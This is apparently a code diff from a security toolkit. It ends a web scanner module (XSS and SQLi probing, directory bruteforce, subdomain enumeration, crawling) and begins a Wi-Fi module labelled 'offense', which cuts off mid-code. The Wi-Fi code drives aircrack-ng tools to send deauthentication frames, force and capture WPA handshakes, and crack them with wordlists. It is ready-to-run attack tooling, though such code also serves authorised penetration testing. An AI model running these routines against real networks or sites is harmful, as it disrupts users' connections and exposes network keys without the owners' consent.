'description': f'Reflected XSS in parameter "{param}"',
|
||||
})
|
||||
return findings
|
||||
except Exception:
|
||||
continue
|
||||
|
||||
return findings
|
||||
|
||||
def _extract_param_urls(self, html: str, base_url: str) -> List[str]:
|
||||
"""Extract URLs with parameters from HTML."""
|
||||
urls = set()
|
||||
# href/src/action attributes
|
||||
for match in re.finditer(r'(?:href|src|action)=["\']([^"\']+\?[^"\']+)["\']', html):
|
||||
u = match.group(1)
|
||||
full = urljoin(base_url, u)
|
||||
if urlparse(full).netloc == urlparse(base_url).netloc:
|
||||
urls.add(full)
|
||||
return list(urls)
|
||||
|
||||
# ── Security Headers ──────────────────────────────────────────────────
|
||||
|
||||
def _check_security_headers(self, headers) -> dict:
|
||||
"""Check for presence and values of security headers."""
|
||||
results = {}
|
||||
for h in SECURITY_HEADERS:
|
||||
value = headers.get(h, '')
|
||||
results[h] = {
|
||||
'present': bool(value),
|
||||
'value': value,
|
||||
'rating': 'good' if value else 'missing',
|
||||
}
|
||||
|
||||
# Specific checks
|
||||
csp = headers.get('Content-Security-Policy', '')
|
||||
if csp:
|
||||
if "'unsafe-inline'" in csp or "'unsafe-eval'" in csp:
|
||||
results['Content-Security-Policy']['rating'] = 'weak'
|
||||
|
||||
hsts = headers.get('Strict-Transport-Security', '')
|
||||
if hsts:
|
||||
if 'max-age' in hsts:
|
||||
try:
|
||||
age = int(re.search(r'max-age=(\d+)', hsts).group(1))
|
||||
if age < 31536000:
|
||||
results['Strict-Transport-Security']['rating'] = 'weak'
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return results
|
||||
|
||||
# ── Technology Fingerprinting ─────────────────────────────────────────
|
||||
|
||||
def _fingerprint_tech(self, resp) -> List[str]:
|
||||
"""Identify technologies from response."""
|
||||
techs = []
|
||||
headers_str = '\n'.join(f'{k}: {v}' for k, v in resp.headers.items())
|
||||
body = resp.text[:50000] # Only check first 50KB
|
||||
cookies_str = ' '.join(resp.cookies.keys()) if resp.cookies else ''
|
||||
|
||||
for tech, sigs in TECH_SIGNATURES.items():
|
||||
found = False
|
||||
for h_sig in sigs['headers']:
|
||||
if h_sig.lower() in headers_str.lower():
|
||||
found = True
|
||||
break
|
||||
if not found:
|
||||
for b_sig in sigs['body']:
|
||||
if b_sig.lower() in body.lower():
|
||||
found = True
|
||||
break
|
||||
if not found:
|
||||
for c_sig in sigs['cookies']:
|
||||
if c_sig.lower() in cookies_str.lower():
|
||||
found = True
|
||||
break
|
||||
if found:
|
||||
techs.append(tech)
|
||||
|
||||
return techs
|
||||
|
||||
# ── SSL/TLS Audit ─────────────────────────────────────────────────────
|
||||
|
||||
def _check_ssl(self, hostname: str, port: int = 443) -> dict:
|
||||
"""Check SSL/TLS configuration."""
|
||||
result = {
|
||||
'valid': False,
|
||||
'issuer': '',
|
||||
'subject': '',
|
||||
'expires': '',
|
||||
'protocol': '',
|
||||
'cipher': '',
|
||||
'issues': [],
|
||||
}
|
||||
try:
|
||||
ctx = ssl.create_default_context()
|
||||
ctx.check_hostname = False
|
||||
ctx.verify_mode = ssl.CERT_NONE
|
||||
with ctx.wrap_socket(socket.socket(), server_hostname=hostname) as s:
|
||||
s.settimeout(5)
|
||||
s.connect((hostname, port))
|
||||
cert = s.getpeercert(True)
|
||||
result['protocol'] = s.version()
|
||||
result['cipher'] = s.cipher()[0] if s.cipher() else ''
|
||||
|
||||
# Try with verification
|
||||
ctx2 = ssl.create_default_context()
|
||||
try:
|
||||
with ctx2.wrap_socket(socket.socket(), server_hostname=hostname) as s2:
|
||||
s2.settimeout(5)
|
||||
s2.connect((hostname, port))
|
||||
cert = s2.getpeercert()
|
||||
result['valid'] = True
|
||||
result['issuer'] = dict(x[0] for x in cert.get('issuer', []))
|
||||
result['subject'] = dict(x[0] for x in cert.get('subject', []))
|
||||
result['expires'] = cert.get('notAfter', '')
|
||||
except ssl.SSLCertVerificationError as e:
|
||||
result['issues'].append(f'Certificate validation failed: {e}')
|
||||
|
||||
# Check for weak protocols
|
||||
if result['protocol'] in ('TLSv1', 'TLSv1.1', 'SSLv3'):
|
||||
result['issues'].append(f'Weak protocol: {result["protocol"]}')
|
||||
|
||||
except Exception as e:
|
||||
result['error'] = str(e)
|
||||
|
||||
return result
|
||||
|
||||
# ── Crawler ───────────────────────────────────────────────────────────
|
||||
|
||||
def crawl(self, url: str, max_pages: int = 50, depth: int = 3) -> dict:
|
||||
"""Spider a website and build a sitemap."""
|
||||
if not _HAS_REQUESTS:
|
||||
return {'ok': False, 'error': 'requests library required'}
|
||||
|
||||
url = self._normalize_url(url)
|
||||
base_domain = urlparse(url).netloc
|
||||
visited: Set[str] = set()
|
||||
pages = []
|
||||
queue = [(url, 0)]
|
||||
sess = self._get_session()
|
||||
|
||||
while queue and len(visited) < max_pages:
|
||||
current_url, current_depth = queue.pop(0)
|
||||
if current_url in visited or current_depth > depth:
|
||||
continue
|
||||
visited.add(current_url)
|
||||
|
||||
try:
|
||||
r = sess.get(current_url, timeout=5, allow_redirects=True)
|
||||
page = {
|
||||
'url': current_url,
|
||||
'status': r.status_code,
|
||||
'content_type': r.headers.get('Content-Type', ''),
|
||||
'size': len(r.content),
|
||||
'title': '',
|
||||
'forms': 0,
|
||||
'links_out': 0,
|
||||
}
|
||||
# Extract title
|
||||
title_match = re.search(r'<title[^>]*>([^<]+)</title>', r.text, re.I)
|
||||
if title_match:
|
||||
page['title'] = title_match.group(1).strip()
|
||||
|
||||
# Count forms
|
||||
page['forms'] = len(re.findall(r'<form', r.text, re.I))
|
||||
|
||||
# Extract links for further crawling
|
||||
links = re.findall(r'href=["\']([^"\']+)["\']', r.text)
|
||||
outlinks = 0
|
||||
for link in links:
|
||||
full_link = urljoin(current_url, link)
|
||||
parsed = urlparse(full_link)
|
||||
if parsed.netloc == base_domain:
|
||||
clean = f'{parsed.scheme}://{parsed.netloc}{parsed.path}'
|
||||
if clean not in visited:
|
||||
queue.append((clean, current_depth + 1))
|
||||
else:
|
||||
outlinks += 1
|
||||
page['links_out'] = outlinks
|
||||
pages.append(page)
|
||||
|
||||
except Exception:
|
||||
continue
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'url': url,
|
||||
'pages_crawled': len(pages),
|
||||
'pages': pages,
|
||||
}
|
||||
|
||||
# ── Job Management ────────────────────────────────────────────────────
|
||||
|
||||
def get_job_status(self, job_id: str) -> dict:
|
||||
holder = self._active_jobs.get(job_id)
|
||||
if not holder:
|
||||
return {'ok': False, 'error': 'Job not found'}
|
||||
result = {
|
||||
'ok': True,
|
||||
'done': holder['done'],
|
||||
'tested': holder['tested'],
|
||||
'total': holder['total'],
|
||||
'found': holder['found'],
|
||||
}
|
||||
if holder['done']:
|
||||
self._active_jobs.pop(job_id, None)
|
||||
return result
|
||||
|
||||
# ── Helpers ───────────────────────────────────────────────────────────
|
||||
|
||||
@staticmethod
|
||||
def _normalize_url(url: str) -> str:
|
||||
url = url.strip()
|
||||
if not url.startswith(('http://', 'https://')):
|
||||
url = 'https://' + url
|
||||
return url
|
||||
|
||||
|
||||
# ── Singleton ─────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
_lock = threading.Lock()
|
||||
|
||||
|
||||
def get_webapp_scanner() -> WebAppScanner:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
with _lock:
|
||||
if _instance is None:
|
||||
_instance = WebAppScanner()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI ───────────────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""Interactive CLI for Web Application Scanner."""
|
||||
svc = get_webapp_scanner()
|
||||
|
||||
while True:
|
||||
print("\n╔═══════════════════════════════════════╗")
|
||||
print("║ WEB APPLICATION SCANNER ║")
|
||||
print("╠═══════════════════════════════════════╣")
|
||||
print("║ 1 — Quick Scan (headers + tech) ║")
|
||||
print("║ 2 — Directory Bruteforce ║")
|
||||
print("║ 3 — Subdomain Enumeration ║")
|
||||
print("║ 4 — Vulnerability Scan (SQLi/XSS) ║")
|
||||
print("║ 5 — Crawl / Spider ║")
|
||||
print("║ 0 — Back ║")
|
||||
print("╚═══════════════════════════════════════╝")
|
||||
|
||||
choice = input("\n Select: ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
url = input(" URL: ").strip()
|
||||
if not url:
|
||||
continue
|
||||
print(" Scanning...")
|
||||
r = svc.quick_scan(url)
|
||||
print(f"\n Status: {r.get('status_code')}")
|
||||
print(f" Server: {r.get('server', 'unknown')}")
|
||||
if r.get('technologies'):
|
||||
print(f" Technologies: {', '.join(r['technologies'])}")
|
||||
if r.get('security_headers'):
|
||||
print(" Security Headers:")
|
||||
for h, info in r['security_headers'].items():
|
||||
mark = '\033[92m✓\033[0m' if info['present'] else '\033[91m✗\033[0m'
|
||||
print(f" {mark} {h}")
|
||||
if r.get('ssl'):
|
||||
ssl_info = r['ssl']
|
||||
print(f" SSL: {'Valid' if ssl_info.get('valid') else 'INVALID'} "
|
||||
f"({ssl_info.get('protocol', '?')})")
|
||||
for issue in ssl_info.get('issues', []):
|
||||
print(f" [!] {issue}")
|
||||
elif choice == '2':
|
||||
url = input(" URL: ").strip()
|
||||
if not url:
|
||||
continue
|
||||
print(" Starting directory bruteforce...")
|
||||
r = svc.dir_bruteforce(url)
|
||||
if r.get('job_id'):
|
||||
while True:
|
||||
time.sleep(2)
|
||||
s = svc.get_job_status(r['job_id'])
|
||||
print(f" [{s['tested']}/{s['total']}] Found: {len(s['found'])}", end='\r')
|
||||
if s['done']:
|
||||
print()
|
||||
for item in s['found']:
|
||||
print(f" [{item['status']}] {item['path']} ({item['size']} bytes)")
|
||||
break
|
||||
elif choice == '3':
|
||||
domain = input(" Domain: ").strip()
|
||||
if not domain:
|
||||
continue
|
||||
print(" Enumerating subdomains...")
|
||||
r = svc.subdomain_enum(domain)
|
||||
print(f"\n Found {r['count']} subdomains:")
|
||||
for sub in r.get('subdomains', []):
|
||||
print(f" {sub}")
|
||||
elif choice == '4':
|
||||
url = input(" URL: ").strip()
|
||||
if not url:
|
||||
continue
|
||||
print(" Scanning for vulnerabilities...")
|
||||
r = svc.vuln_scan(url)
|
||||
if r.get('findings'):
|
||||
print(f"\n Found {len(r['findings'])} potential vulnerabilities:")
|
||||
for f in r['findings']:
|
||||
print(f" [{f['severity'].upper()}] {f['type'].upper()}: {f['description']}")
|
||||
print(f" Parameter: {f.get('parameter', '?')}, Payload: {f.get('payload', '?')}")
|
||||
else:
|
||||
print(" No vulnerabilities found in tested parameters.")
|
||||
elif choice == '5':
|
||||
url = input(" URL: ").strip()
|
||||
if not url:
|
||||
continue
|
||||
max_pages = int(input(" Max pages (default 50): ").strip() or '50')
|
||||
print(" Crawling...")
|
||||
r = svc.crawl(url, max_pages=max_pages)
|
||||
print(f"\n Crawled {r.get('pages_crawled', 0)} pages:")
|
||||
for page in r.get('pages', []):
|
||||
print(f" [{page['status']}] {page['url']}"
|
||||
f" ({page['size']} bytes, {page['forms']} forms)")
|
||||
843
modules/wifi_audit.py
Normal file
843
modules/wifi_audit.py
Normal file
@ -0,0 +1,843 @@
|
||||
"""AUTARCH WiFi Auditing
|
||||
|
||||
Interface management, network discovery, handshake capture, deauth attack,
|
||||
rogue AP detection, WPS attack, and packet capture for wireless security auditing.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "WiFi network auditing & attack tools"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "offense"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import signal
|
||||
import shutil
|
||||
import threading
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Dict, List, Optional, Any, Tuple
|
||||
|
||||
try:
|
||||
from core.paths import find_tool, get_data_dir
|
||||
except ImportError:
|
||||
def find_tool(name):
|
||||
return shutil.which(name)
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
|
||||
# ── Data Structures ──────────────────────────────────────────────────────────
|
||||
|
||||
@dataclass
|
||||
class AccessPoint:
|
||||
bssid: str
|
||||
ssid: str = ""
|
||||
channel: int = 0
|
||||
encryption: str = ""
|
||||
cipher: str = ""
|
||||
auth: str = ""
|
||||
signal: int = 0
|
||||
beacons: int = 0
|
||||
data_frames: int = 0
|
||||
clients: List[str] = field(default_factory=list)
|
||||
|
||||
@dataclass
|
||||
class WifiClient:
|
||||
mac: str
|
||||
bssid: str = ""
|
||||
signal: int = 0
|
||||
frames: int = 0
|
||||
probe: str = ""
|
||||
|
||||
|
||||
# ── WiFi Auditor ─────────────────────────────────────────────────────────────
|
||||
|
||||
class WiFiAuditor:
|
||||
"""WiFi auditing toolkit using aircrack-ng suite."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'wifi')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
self.captures_dir = os.path.join(self.data_dir, 'captures')
|
||||
os.makedirs(self.captures_dir, exist_ok=True)
|
||||
|
||||
# Tool paths
|
||||
self.airmon = find_tool('airmon-ng') or shutil.which('airmon-ng')
|
||||
self.airodump = find_tool('airodump-ng') or shutil.which('airodump-ng')
|
||||
self.aireplay = find_tool('aireplay-ng') or shutil.which('aireplay-ng')
|
||||
self.aircrack = find_tool('aircrack-ng') or shutil.which('aircrack-ng')
|
||||
self.reaver = find_tool('reaver') or shutil.which('reaver')
|
||||
self.wash = find_tool('wash') or shutil.which('wash')
|
||||
self.iwconfig = shutil.which('iwconfig')
|
||||
self.iw = shutil.which('iw')
|
||||
self.ip_cmd = shutil.which('ip')
|
||||
|
||||
# State
|
||||
self.monitor_interface: Optional[str] = None
|
||||
self.scan_results: Dict[str, AccessPoint] = {}
|
||||
self.clients: List[WifiClient] = []
|
||||
self.known_aps: List[Dict] = []
|
||||
self._scan_proc: Optional[subprocess.Popen] = None
|
||||
self._capture_proc: Optional[subprocess.Popen] = None
|
||||
self._jobs: Dict[str, Dict] = {}
|
||||
|
||||
def get_tools_status(self) -> Dict[str, bool]:
|
||||
"""Check availability of all required tools."""
|
||||
return {
|
||||
'airmon-ng': self.airmon is not None,
|
||||
'airodump-ng': self.airodump is not None,
|
||||
'aireplay-ng': self.aireplay is not None,
|
||||
'aircrack-ng': self.aircrack is not None,
|
||||
'reaver': self.reaver is not None,
|
||||
'wash': self.wash is not None,
|
||||
'iwconfig': self.iwconfig is not None,
|
||||
'iw': self.iw is not None,
|
||||
'ip': self.ip_cmd is not None,
|
||||
}
|
||||
|
||||
# ── Interface Management ─────────────────────────────────────────────
|
||||
|
||||
def get_interfaces(self) -> List[Dict]:
|
||||
"""List wireless interfaces."""
|
||||
interfaces = []
|
||||
# Try iw first
|
||||
if self.iw:
|
||||
try:
|
||||
out = subprocess.check_output([self.iw, 'dev'], text=True, timeout=5)
|
||||
iface = None
|
||||
for line in out.splitlines():
|
||||
line = line.strip()
|
||||
if line.startswith('Interface'):
|
||||
iface = {'name': line.split()[-1], 'mode': 'managed', 'channel': 0, 'mac': ''}
|
||||
elif iface:
|
||||
if line.startswith('type'):
|
||||
iface['mode'] = line.split()[-1]
|
||||
elif line.startswith('channel'):
|
||||
try:
|
||||
iface['channel'] = int(line.split()[1])
|
||||
except (ValueError, IndexError):
|
||||
pass
|
||||
elif line.startswith('addr'):
|
||||
iface['mac'] = line.split()[-1]
|
||||
if iface:
|
||||
interfaces.append(iface)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Fallback to iwconfig
|
||||
if not interfaces and self.iwconfig:
|
||||
try:
|
||||
out = subprocess.check_output([self.iwconfig], text=True,
|
||||
stderr=subprocess.DEVNULL, timeout=5)
|
||||
for block in out.split('\n\n'):
|
||||
if 'IEEE 802.11' in block or 'ESSID' in block:
|
||||
name = block.split()[0]
|
||||
mode = 'managed'
|
||||
if 'Mode:Monitor' in block:
|
||||
mode = 'monitor'
|
||||
elif 'Mode:Master' in block:
|
||||
mode = 'master'
|
||||
freq_m = re.search(r'Channel[:\s]*(\d+)', block)
|
||||
ch = int(freq_m.group(1)) if freq_m else 0
|
||||
interfaces.append({'name': name, 'mode': mode, 'channel': ch, 'mac': ''})
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Fallback: list from /sys
|
||||
if not interfaces:
|
||||
try:
|
||||
wireless_dir = Path('/sys/class/net')
|
||||
if wireless_dir.exists():
|
||||
for d in wireless_dir.iterdir():
|
||||
if (d / 'wireless').exists() or (d / 'phy80211').exists():
|
||||
interfaces.append({
|
||||
'name': d.name, 'mode': 'unknown', 'channel': 0, 'mac': ''
|
||||
})
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return interfaces
|
||||
|
||||
def enable_monitor(self, interface: str) -> Dict:
|
||||
"""Put interface into monitor mode."""
|
||||
if not self.airmon:
|
||||
return {'ok': False, 'error': 'airmon-ng not found'}
|
||||
|
||||
try:
|
||||
# Kill interfering processes
|
||||
subprocess.run([self.airmon, 'check', 'kill'],
|
||||
capture_output=True, text=True, timeout=10)
|
||||
|
||||
# Enable monitor mode
|
||||
result = subprocess.run([self.airmon, 'start', interface],
|
||||
capture_output=True, text=True, timeout=10)
|
||||
|
||||
# Detect monitor interface name (usually wlan0mon or similar)
|
||||
mon_iface = interface + 'mon'
|
||||
for line in result.stdout.splitlines():
|
||||
m = re.search(r'\(monitor mode.*enabled.*on\s+(\S+)\)', line, re.I)
|
||||
if m:
|
||||
mon_iface = m.group(1)
|
||||
break
|
||||
m = re.search(r'monitor mode.*vif.*enabled.*for.*\[(\S+)\]', line, re.I)
|
||||
if m:
|
||||
mon_iface = m.group(1)
|
||||
break
|
||||
|
||||
self.monitor_interface = mon_iface
|
||||
return {'ok': True, 'interface': mon_iface, 'message': f'Monitor mode enabled on {mon_iface}'}
|
||||
|
||||
except subprocess.TimeoutExpired:
|
||||
return {'ok': False, 'error': 'Timeout enabling monitor mode'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def disable_monitor(self, interface: str = None) -> Dict:
|
||||
"""Disable monitor mode and restore managed mode."""
|
||||
if not self.airmon:
|
||||
return {'ok': False, 'error': 'airmon-ng not found'}
|
||||
|
||||
iface = interface or self.monitor_interface
|
||||
if not iface:
|
||||
return {'ok': False, 'error': 'No monitor interface specified'}
|
||||
|
||||
try:
|
||||
result = subprocess.run([self.airmon, 'stop', iface],
|
||||
capture_output=True, text=True, timeout=10)
|
||||
self.monitor_interface = None
|
||||
# Restart network manager
|
||||
subprocess.run(['systemctl', 'start', 'NetworkManager'],
|
||||
capture_output=True, timeout=5)
|
||||
return {'ok': True, 'message': f'Monitor mode disabled on {iface}'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def set_channel(self, interface: str, channel: int) -> Dict:
|
||||
"""Set wireless interface channel."""
|
||||
if self.iw:
|
||||
try:
|
||||
subprocess.run([self.iw, 'dev', interface, 'set', 'channel', str(channel)],
|
||||
capture_output=True, text=True, timeout=5)
|
||||
return {'ok': True, 'channel': channel}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
return {'ok': False, 'error': 'iw not found'}
|
||||
|
||||
# ── Network Scanning ─────────────────────────────────────────────────
|
||||
|
||||
def scan_networks(self, interface: str = None, duration: int = 15) -> Dict:
|
||||
"""Scan for nearby wireless networks using airodump-ng."""
|
||||
iface = interface or self.monitor_interface
|
||||
if not iface:
|
||||
return {'ok': False, 'error': 'No monitor interface. Enable monitor mode first.'}
|
||||
if not self.airodump:
|
||||
return {'ok': False, 'error': 'airodump-ng not found'}
|
||||
|
||||
prefix = os.path.join(self.captures_dir, f'scan_{int(time.time())}')
|
||||
|
||||
try:
|
||||
proc = subprocess.Popen(
|
||||
[self.airodump, '--output-format', 'csv', '-w', prefix, iface],
|
||||
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
|
||||
)
|
||||
time.sleep(duration)
|
||||
proc.send_signal(signal.SIGINT)
|
||||
proc.wait(timeout=5)
|
||||
|
||||
# Parse CSV output
|
||||
csv_file = prefix + '-01.csv'
|
||||
if os.path.exists(csv_file):
|
||||
self._parse_airodump_csv(csv_file)
|
||||
return {
|
||||
'ok': True,
|
||||
'access_points': [self._ap_to_dict(ap) for ap in self.scan_results.values()],
|
||||
'clients': [self._client_to_dict(c) for c in self.clients],
|
||||
'count': len(self.scan_results)
|
||||
}
|
||||
return {'ok': False, 'error': 'No scan output produced'}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def _parse_airodump_csv(self, filepath: str):
|
||||
"""Parse airodump-ng CSV output."""
|
||||
self.scan_results.clear()
|
||||
self.clients.clear()
|
||||
|
||||
try:
|
||||
with open(filepath, 'r', errors='ignore') as f:
|
||||
content = f.read()
|
||||
|
||||
# Split into AP section and client section
|
||||
sections = content.split('Station MAC')
|
||||
ap_section = sections[0] if sections else ''
|
||||
client_section = sections[1] if len(sections) > 1 else ''
|
||||
|
||||
# Parse APs
|
||||
for line in ap_section.splitlines():
|
||||
parts = [p.strip() for p in line.split(',')]
|
||||
if len(parts) >= 14 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
|
||||
bssid = parts[0].upper()
|
||||
ap = AccessPoint(
|
||||
bssid=bssid,
|
||||
channel=int(parts[3]) if parts[3].strip().isdigit() else 0,
|
||||
signal=int(parts[8]) if parts[8].strip().lstrip('-').isdigit() else 0,
|
||||
encryption=parts[5].strip(),
|
||||
cipher=parts[6].strip(),
|
||||
auth=parts[7].strip(),
|
||||
beacons=int(parts[9]) if parts[9].strip().isdigit() else 0,
|
||||
data_frames=int(parts[10]) if parts[10].strip().isdigit() else 0,
|
||||
ssid=parts[13].strip() if len(parts) > 13 else ''
|
||||
)
|
||||
self.scan_results[bssid] = ap
|
||||
|
||||
# Parse clients
|
||||
for line in client_section.splitlines():
|
||||
parts = [p.strip() for p in line.split(',')]
|
||||
if len(parts) >= 6 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
|
||||
client = WifiClient(
|
||||
mac=parts[0].upper(),
|
||||
signal=int(parts[3]) if parts[3].strip().lstrip('-').isdigit() else 0,
|
||||
frames=int(parts[4]) if parts[4].strip().isdigit() else 0,
|
||||
bssid=parts[5].strip().upper() if len(parts) > 5 else '',
|
||||
probe=parts[6].strip() if len(parts) > 6 else ''
|
||||
)
|
||||
self.clients.append(client)
|
||||
# Associate with AP
|
||||
if client.bssid in self.scan_results:
|
||||
self.scan_results[client.bssid].clients.append(client.mac)
|
||||
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def get_scan_results(self) -> Dict:
|
||||
"""Return current scan results."""
|
||||
return {
|
||||
'access_points': [self._ap_to_dict(ap) for ap in self.scan_results.values()],
|
||||
'clients': [self._client_to_dict(c) for c in self.clients],
|
||||
'count': len(self.scan_results)
|
||||
}
|
||||
|
||||
# ── Handshake Capture ────────────────────────────────────────────────
|
||||
|
||||
def capture_handshake(self, interface: str, bssid: str, channel: int,
|
||||
deauth_count: int = 5, timeout: int = 60) -> str:
|
||||
"""Capture WPA handshake. Returns job_id for async polling."""
|
||||
job_id = f'handshake_{int(time.time())}'
|
||||
self._jobs[job_id] = {
|
||||
'type': 'handshake', 'status': 'running', 'bssid': bssid,
|
||||
'result': None, 'started': time.time()
|
||||
}
|
||||
|
||||
def _capture():
|
||||
try:
|
||||
# Set channel
|
||||
self.set_channel(interface, channel)
|
||||
|
||||
prefix = os.path.join(self.captures_dir, f'hs_{bssid.replace(":", "")}_{int(time.time())}')
|
||||
|
||||
# Start capture
|
||||
cap_proc = subprocess.Popen(
|
||||
[self.airodump, '-c', str(channel), '--bssid', bssid,
|
||||
'-w', prefix, interface],
|
||||
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
|
||||
)
|
||||
|
||||
# Send deauths after short delay
|
||||
time.sleep(3)
|
||||
if self.aireplay:
|
||||
subprocess.run(
|
||||
[self.aireplay, '-0', str(deauth_count), '-a', bssid, interface],
|
||||
capture_output=True, timeout=15
|
||||
)
|
||||
|
||||
# Wait for handshake
|
||||
cap_file = prefix + '-01.cap'
|
||||
start = time.time()
|
||||
captured = False
|
||||
while time.time() - start < timeout:
|
||||
if os.path.exists(cap_file) and self.aircrack:
|
||||
check = subprocess.run(
|
||||
[self.aircrack, '-a', '2', '-b', bssid, cap_file],
|
||||
capture_output=True, text=True, timeout=10
|
||||
)
|
||||
if '1 handshake' in check.stdout.lower() or 'valid handshake' in check.stdout.lower():
|
||||
captured = True
|
||||
break
|
||||
time.sleep(2)
|
||||
|
||||
cap_proc.send_signal(signal.SIGINT)
|
||||
cap_proc.wait(timeout=5)
|
||||
|
||||
if captured:
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
self._jobs[job_id]['result'] = {
|
||||
'ok': True, 'capture_file': cap_file, 'bssid': bssid,
|
||||
'message': f'Handshake captured for {bssid}'
|
||||
}
|
||||
else:
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
self._jobs[job_id]['result'] = {
|
||||
'ok': False, 'error': 'Handshake capture timed out',
|
||||
'capture_file': cap_file if os.path.exists(cap_file) else None
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
self._jobs[job_id]['status'] = 'error'
|
||||
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
|
||||
|
||||
threading.Thread(target=_capture, daemon=True).start()
|
||||
return job_id
|
||||
|
||||
def crack_handshake(self, capture_file: str, wordlist: str, bssid: str = None) -> str:
|
||||
"""Crack captured handshake with wordlist. Returns job_id."""
|
||||
if not self.aircrack:
|
||||
return ''
|
||||
|
||||
job_id = f'crack_{int(time.time())}'
|
||||
self._jobs[job_id] = {
|
||||
'type': 'crack', 'status': 'running',
|
||||
'result': None, 'started': time.time()
|
||||
}
|
||||
|
||||
def _crack():
|
||||
try:
|
||||
cmd = [self.aircrack, '-w', wordlist, '-b', bssid, capture_file] if bssid else \
|
||||
[self.aircrack, '-w', wordlist, capture_file]
|
||||
|
||||
result = subprocess.run(cmd, capture_output=True, text=True, timeout=3600)
|
||||
|
||||
# Parse result
|
||||
key_match = re.search(r'KEY FOUND!\s*\[\s*(.+?)\s*\]', result.stdout)
|
||||
if key_match:
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
self._jobs[job_id]['result'] = {
|
||||
'ok': True, 'key': key_match.group(1), 'message': 'Key found!'
|
||||
}
|
||||
else:
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
self._jobs[job_id]['result'] = {
|
||||
'ok': False, 'error': 'Key not found in wordlist'
|
||||
}
|
||||
|
||||
except subprocess.TimeoutExpired:
|
||||
self._jobs[job_id]['status'] = 'error'
|
||||
self._jobs[job_id]['result'] = {'ok': False, 'error': 'Crack timeout (1hr)'}
|
||||
except Exception as e:
|
||||
self._jobs[job_id]['status'] = 'error'
|
||||
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
|
||||
|
||||
threading.Thread(target=_crack, daemon=True).start()
|
||||
return job_id
|
||||
|
||||
# ── Deauth Attack ────────────────────────────────────────────────────
|
||||
|
||||
def deauth(self, interface: str, bssid: str, client: str = None,
|
||||
count: int = 10) -> Dict:
|
||||
"""Send deauthentication frames."""
|
||||
if not self.aireplay:
|
||||
return {'ok': False, 'error': 'aireplay-ng not found'}
|
||||
|
||||
iface = interface or self.monitor_interface
|
||||
if not iface:
|
||||
return {'ok': False, 'error': 'No monitor interface'}
|
||||
|
||||
try:
|
||||
cmd = [self.aireplay, '-0', str(count), '-a', bssid]
|
||||
if client:
|
||||
cmd += ['-c', client]
|
||||
cmd.append(iface)
|
||||
|
||||
result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
|
||||
return {
|
||||
'ok': True,
|
||||
'message': f'Sent {count} deauth frames to {bssid}' +
|
||||
(f' targeting {client}' if client else ' (broadcast)'),
|
||||
'output': result.stdout
|
||||
}
|
||||
except subprocess.TimeoutExpired:
|
||||
return {'ok': False, 'error': 'Deauth timeout'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
# ── Rogue AP Detection ───────────────────────────────────────────────
|
||||
|
||||
def save_known_aps(self):
|
||||
"""Save current scan as known/baseline APs."""
|
||||
self.known_aps = [self._ap_to_dict(ap) for ap in self.scan_results.values()]
|
||||
known_file = os.path.join(self.data_dir, 'known_aps.json')
|
||||
with open(known_file, 'w') as f:
|
||||
json.dump(self.known_aps, f, indent=2)
|
||||
return {'ok': True, 'count': len(self.known_aps)}
|
||||
|
||||
def load_known_aps(self) -> List[Dict]:
|
||||
"""Load previously saved known APs."""
|
||||
known_file = os.path.join(self.data_dir, 'known_aps.json')
|
||||
if os.path.exists(known_file):
|
||||
with open(known_file) as f:
|
||||
self.known_aps = json.load(f)
|
||||
return self.known_aps
|
||||
|
||||
def detect_rogue_aps(self) -> Dict:
|
||||
"""Compare current scan against known APs to detect evil twins/rogues."""
|
||||
if not self.known_aps:
|
||||
self.load_known_aps()
|
||||
if not self.known_aps:
|
||||
return {'ok': False, 'error': 'No baseline APs saved. Run save_known_aps first.'}
|
||||
|
||||
known_bssids = {ap['bssid'] for ap in self.known_aps}
|
||||
known_ssids = {ap['ssid'] for ap in self.known_aps if ap['ssid']}
|
||||
known_pairs = {(ap['bssid'], ap['ssid']) for ap in self.known_aps}
|
||||
|
||||
alerts = []
|
||||
for bssid, ap in self.scan_results.items():
|
||||
if bssid not in known_bssids:
|
||||
if ap.ssid in known_ssids:
|
||||
# Same SSID, different BSSID = possible evil twin
|
||||
alerts.append({
|
||||
'type': 'evil_twin',
|
||||
'severity': 'high',
|
||||
'bssid': bssid,
|
||||
